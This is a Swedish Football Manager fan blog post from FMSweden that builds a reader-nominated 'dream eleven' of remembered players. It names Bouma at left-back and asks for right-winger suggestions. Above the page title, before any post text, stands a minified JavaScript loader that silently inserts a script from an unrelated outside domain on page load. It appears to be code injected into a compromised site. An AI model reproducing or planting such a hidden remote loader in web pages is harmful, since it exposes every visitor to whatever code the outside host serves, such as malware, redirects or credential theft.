;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns – Högerytter – FMSweden
Meny Stäng

Lirare vi minns – Högerytter

Det är dags att ta ut en drömelva på lirare vi minns från tidiga upplagor. Det kan antingen vara spelare som varit outstanding överlag eller gömda guldkorn som varit bra för just er. Vilken upplaga av spelet spelar ingen roll. Ni nominerar spelare för varje position, jag läser på om spelarna, värderar hur många som tycker om samma spelare och sen tar jag ut vinnaren. Tillslut har vi en drömelva av lirare vi minns.

Akinfeev
Vanden Borre Balanta West Bouma
X X X X
X X

Avb: Vrsaljko, Zapata, Santon

Det var verkligen svårt att plocka ut en vänsterback då ni kom med så många bra förslag men jag väljer magkänslan och valet föll på Wilfried Bouma och på bänken kommer Santon.

Nu är det dags för högerytter. Vi spelar 4-4-2 men vi kan absolut spela med en väldigt offensiv ytterforward även i den här positionen. Så vem tycker ni passar in som ytter i drömelvan?

Please wait...

Liknande Inlägg

6 kommentarer

Lämna ett svar